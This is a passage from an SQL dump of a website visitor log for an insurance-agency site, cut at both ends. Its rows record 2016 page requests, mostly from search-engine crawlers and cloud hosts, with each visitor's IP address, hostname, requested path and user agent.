+http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(18032,'0b_bbaeb683005dabbf9eef49c253dd4707','1460833364','157.55.39.177','msnbot-157-55-39-177.search.msn.com','/companylinks.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18033,'0b_9080f69c6643f55a5fcddecb7fdafaa6','1460836256','108.174.50.5','108-174-50-5-host.colocrossing.com','/register/','Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0','http://www.empireins.com/','',0,'Win7','Firefox 32','us','','','','','','','0','0',0),(18036,'0b_f5fb3782ca314238f10def993c73ef22','1460838766','207.46.13.110','msnbot-207-46-13-110.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18039,'0b_5433465ee8fcd6e04e3389afa3e15e42','1460840042','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(18041,'0b_e7c86e4a1199f5f73fd6d49e8f6325d3','1460843597','5.9.63.149','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(18042,'0b_e7c86e4a1199f5f73fd6d49e8f6325d3','1460843599','5.9.63.149','majestic12.co.uk','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(18045,'0b_950d5ae691db99924204779968c0251a','1460845166','52.26.93.103','ec2-52-26-93-103.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','','',0,'Win8','Chrome 36','','','','','','','','0','0',0),(18047,'0b_950d5ae691db99924204779968c0251a','1460845167','52.26.93.103','ec2-52-26-93-103.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','','',0,'Win8','Chrome 36','','','','','','','','0','0',0),(18050,'0b_950d5ae691db99924204779968c0251a','1460845169','52.26.93.103','ec2-52-26-93-103.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','','',0,'Win8','Chrome 36','','','','','','','','0','0',0),(18053,'0b_d10fab90e2a39db4186eabf85df711a2','1460849176','207.46.13.110','msnbot-207-46-13-110.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18056,'0b_d10fab90e2a39db4186eabf85df711a2','1460849176','207.46.13.110','msnbot-207-46-13-110.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18059,'0b_2a4c1f02b54d4e5b15145d89725182d6','1460852989','66.249.64.24','crawl-66-249-64-24.googlebot.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(18062,'0b_e5c72fb4e6810d6e69180bbb160a4127','1460856538','46.161.9.6','46.161.9.6','/register/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18063,'0b_e5c72fb4e6810d6e69180bbb160a4127','1460856581','46.161.9.6','46.161.9.6','/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18065,'0b_e5c72fb4e6810d6e69180bbb160a4127','1460856591','46.161.9.6','46.161.9.6','/agent-tools/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18066,'0b_147cbf404dd74447142b30d85c28f570','1460856602','46.161.9.6','46.161.9.6','/about-us/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18069,'0b_147cbf404dd74447142b30d85c28f570','1460856613','46.161.9.6','46.161.9.6','/insentives/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18071,'0b_147cbf404dd74447142b30d85c28f570','1460856623','46.161.9.6','46.161.9.6','/licensing-contracting/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18072,'0b_147cbf404dd74447142b30d85c28f570','1460856634','46.161.9.6','46.161.9.6','/carriers/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18074,'0b_147cbf404dd74447142b30d85c28f570','1460856644','46.161.9.6','46.161.9.6','/contact/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18075,'0b_147cbf404dd74447142b30d85c28f570','1460856654','46.161.9.6','46.161.9.6','/case-status/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18078,'0b_147cbf404dd74447142b30d85c28f570','1460856665','46.161.9.6','46.161.9.6','/forms/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18080,'0b_147cbf404dd74447142b30d85c28f570','1460856677','46.161.9.6','46.161.9.6','/igo/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18081,'0b_147cbf404dd74447142b30d85c28f570','1460856687','46.161.9.6','46.161.9.6','/term-quotes/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18083,'0b_147cbf404dd74447142b30d85c28f570','1460856699','46.161.9.6','46.161.9.6','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18086,'0b_147cbf404dd74447142b30d85c28f570','1460856709','46.161.9.6','46.161.9.6','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18089,'0b_147cbf404dd74447142b30d85c28f570','1460856721','46.161.9.6','46.161.9.6','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18092,'0b_147cbf404dd74447142b30d85c28f570','1460856731','46.161.9.6','46.161.9.6','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10','','',0,'iPad','Safari 4 Mobile','us','','','','','','','0','0',0),(18095,'0b_601202abecd592551269f3a68a3c5b80','1460859981','54.204.156.52','ec2-54-204-156-52.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36','','',0,'Win8','Chrome 34','','','','','','','','0','0',0),(18096,'0b_b15d546e294d0c86b302a35e37476fb2','1460859981','54.204.156.52','ec2-54-204-156-52.compute-1.amazonaws.com','/','Go 1.1 package http','http://empireins.com','',0,'','','','','','Go','','','','0','0',0),(18099,'0b_e57f62df24d05825cc893a53c39eb2b1','1460861131','130.185.155.74','130.185.155.74','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18101,'0b_e57f62df24d05825cc893a53c39eb2b1','1460861141','130.185.155.74','130.185.155.74','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18104,'0b_e57f62df24d05825cc893a53c39eb2b1','1460861151','130.185.155.74','130.185.155.74','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18107,'0b_15d86ab5e066428902fc8699e6b151b5','1460861471','54.92.159.200','ec2-54-92-159-200.compute-1.amazonaws.com','/igo/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36','','',0,'Win8','Chrome 34','','','','','','','','0','0',0),(18108,'0b_15b368bb94bbbc550f687c15945d3122','1460861471','54.92.159.200','ec2-54-92-159-200.compute-1.amazonaws.com','/igo/','Go 1.1 package http','http://empireins.com/igo/','',0,'','','','','','Go','','','','0','0',0),(18110,'0b_e65055fcc9c5997725a72f116abe7c5d','1460861496','54.146.239.164','ec2-54-146-239-164.compute-1.amazonaws.com','/case-status/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36','','',0,'Win8','Chrome 34','','','','','','','','0','0',0),(18113,'0b_b5d59a8e8be4fbd24a8a55543398d788','1460861497','54.146.239.164','ec2-54-146-239-164.compute-1.amazonaws.com','/case-status/','Go 1.1 package http','http://empireins.com/case-status/','',0,'','','','','','Go','','','','0','0',0),(18116,'0b_1bdfb79dfe7dbd7b30c350e1c622a0d7','1460861537','50.19.22.182','ec2-50-19-22-182.compute-1.amazonaws.com','/igo/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','','',0,'Win8','Chrome 32','us','','','','','','','0','0',0),(18117,'0b_60396c6c4844087a81680dc869f33222','1460861558','54.87.30.119','ec2-54-87-30-119.compute-1.amazonaws.com','/case-status/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','','',0,'Win8','Chrome 32','us','','','','','','','0','0',0),(18120,'0b_4093355d4a260b27f65b9a808de9bebd','1460861628','54.211.72.38','ec2-54-211-72-38.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','','',0,'Win8','Chrome 32','us','','','','','','','0','0',0),(18123,'0b_4093355d4a260b27f65b9a808de9bebd','1460861629','54.211.72.38','ec2-54-211-72-38.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 32','us','','','','','','','0','0',0),(18125,'0b_4dfd470970cb71e67781a82149690b28','1460862244','51.254.131.244','244.ip-51-254-131.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18128,'0b_4dfd470970cb71e67781a82149690b28','1460862246','51.254.131.244','244.ip-51-254-131.eu','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18129,'0b_4dfd470970cb71e67781a82149690b28','1460862248','51.254.131.244','244.ip-51-254-131.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18132,'0b_4dfd470970cb71e67781a82149690b28','1460862250','51.254.131.244','244.ip-51-254-131.eu','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18134,'0b_4dfd470970cb71e67781a82149690b28','1460862252','51.254.131.244','244.ip-51-254-131.eu','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18137,'0b_4dfd470970cb71e67781a82149690b28','1460862256','51.254.131.244','244.ip-51-254-131.eu','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18140,'0b_4dfd470970cb71e67781a82149690b28','1460862261','51.254.131.244','244.ip-51-254-131.eu','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18143,'0b_4dfd470970cb71e67781a82149690b28','1460862265','51.254.131.244','244.ip-51-254-131.eu','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18144,'0b_4dfd470970cb71e67781a82149690b28','1460862267','51.254.131.244','244.ip-51-254-131.eu','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(18147,'0b_9e1e3ba5d0e93e4cc4dd9fcca937f5b0','1460864163','157.55.39.27','msnbot-157-55-39-27.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18149,'0b_50e5ac85001475b5b9edb7759ae295b3','1460865947','192.3.7.83','192-3-7-83-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0','http://www.empireins.com/','',0,'Win7','Firefox 32','us','','','','','','','0','0',0),(18150,'0b_27b55edae48662df27e66809a3390d89','1460870178','66.249.64.84','crawl-66-249-64-84.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18153,'0b_27b55edae48662df27e66809a3390d89','1460870181','66.249.64.84','crawl-66-249-64-84.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18156,'0b_5bf032dd82885d7cca7f3be23a38ce77','1460870612','157.55.39.27','msnbot-157-55-39-27.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18158,'0b_b25aa69c3ca4b5a9b8586e626dc35e42','1460874233','46.161.62.180','pinspb.ru','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.25','http://EMPIREINS.COM/','',0,'Win7','Google Chrome','ru','','','','','','','0','0',0),(18159,'0b_3dafc2cc7ccc94469620fa34eb16cf93','1460874236','46.161.62.180','pinspb.ru','/','Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0','http://www.empireins.com/','',0,'WinXP','Firefox 40','ru','','','','','','','0','0',0),(18162,'0b_c0158ca241e96dc6712f5545c7962abb','1460874210','37.9.47.156','37.9.47.156','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36','http://EMPIREINS.COM/','',0,'Win7','Chrome 45','','','','','','','','0','0',0),(18165,'0b_e6fe3d2c22e326e7d37526b9da9b4730','1460874609','176.31.39.23','176.31.39.23','/contact/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(18167,'0b_3127be557887971956f024ca283cdfb6','1460878238','165.231.2.234','165.231.2.234','/?author=1','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1','','',0,'WinXP','IE 7','','','','','','','','0','0',0),(18168,'0b_3127be557887971956f024ca283cdfb6','1460878268','165.231.2.234','165.231.2.234','/?author=2','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1','','',0,'WinXP','IE 7','','','','','','','','0','0',0),(18171,'0b_3127be557887971956f024ca283cdfb6','1460878295','165.231.2.234','165.231.2.234','/?author=3','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1','','',0,'WinXP','IE 7','','','','','','','','0','0',0),(18173,'0b_c4e20be7aead9a9eeedbec4e2f111cd8','1460878884','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18174,'0b_edccb3ed68578d203251c68ad2d5b1bc','1460882699','206.217.141.164','206-217-141-164-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0','http://www.empireins.com/','',0,'Win7','Firefox 34','us','','','','','','','0','0',0),(18177,'0b_965d3d583d773dcad41aa4c1085d284d','1460883202','180.76.15.138','baiduspider-180-76-15-138.crawl.baidu.com','/igo/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(18180,'0b_7ec6121603a50710a1d5eb70a9091f84','1460883731','45.79.89.188','li1188-188.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(18183,'0b_b1e1cec2fa55fd926f823f904a7e9a82','1460884958','66.249.64.24','crawl-66-249-64-24.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18186,'0b_29816ede25aa1dee679530bb09777889','1460886282','100.43.91.18','spider-100-43-91-18.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(18189,'0b_d4c6aefe5b035eb58a8355d1ea0a0204','1460886282','141.8.143.232','spider-141-8-143-232.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(18191,'0b_23ab9c3b8bcda2c3571f1f69e13f2334','1460886283','199.21.99.197','spider-199-21-99-197.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(18192,'0b_ebfd97b8cb7426286027a9388e10e36b','1460886283','141.8.143.159','spider-141-8-143-159.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(18195,'0b_d4c6aefe5b035eb58a8355d1ea0a0204','1460886287','141.8.143.242','spider-141-8-143-242.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(18197,'0b_30cb142b3be8bbd22a232edd4222084e','1460887317','130.185.155.10','130.185.155.10','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18200,'0b_30cb142b3be8bbd22a232edd4222084e','1460887327','130.185.155.10','130.185.155.10','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18203,'0b_30cb142b3be8bbd22a232edd4222084e','1460887337','130.185.155.10','130.185.155.10','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18206,'0b_05d2464383af51805eda6c1999dc1972','1460895036','123.125.71.47','baiduspider-123-125-71-47.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(18209,'0b_7e0c518779af1d315c64dea969e34154','1460896183','100.43.91.11','spider-100-43-91-11.yandex.com','/comments/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(18212,'0b_fc78b9a5b163969bc41a4b5265ec8713','1460900833','66.249.64.34','crawl-66-249-64-34.googlebot.com','/licensing-contracting/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(18213,'0b_422eb5729687df04c15a5cc5963972a2','1460901809','180.76.15.161','baiduspider-180-76-15-161.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(18215,'0b_8c06a759432bd20bf8f4d7dccccf1586','1460902090','188.165.234.52','crawl04.lp.007ac9.net','/robots.txt','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(18216,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902090','188.165.234.52','crawl04.lp.007ac9.net','/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18219,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902093','188.165.234.52','crawl04.lp.007ac9.net','/agent-tools/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18222,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902096','188.165.234.52','crawl04.lp.007ac9.net','/register/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18225,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902099','188.165.234.52','crawl04.lp.007ac9.net','/about-us/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18227,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902101','188.165.234.52','crawl04.lp.007ac9.net','/insentives/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18230,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902104','188.165.234.52','crawl04.lp.007ac9.net','/licensing-contracting/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18231,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902107','188.165.234.52','crawl04.lp.007ac9.net','/carriers/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18234,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902109','188.165.234.52','crawl04.lp.007ac9.net','/contact/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18236,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902112','188.165.234.52','crawl04.lp.007ac9.net','/case-status/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18237,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902115','188.165.234.52','crawl04.lp.007ac9.net','/forms/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18239,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902121','188.165.234.52','crawl04.lp.007ac9.net','/igo/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18240,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902124','188.165.234.52','crawl04.lp.007ac9.net','/term-quotes/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18243,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902126','188.165.234.52','crawl04.lp.007ac9.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18245,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902129','188.165.234.52','crawl04.lp.007ac9.net','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(18248,'0b_0b1dac7ca693a632ea3c08987d07d4f1','1460902132','188.165.234.52','crawl04.lp.007ac9.net','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (X11; U; 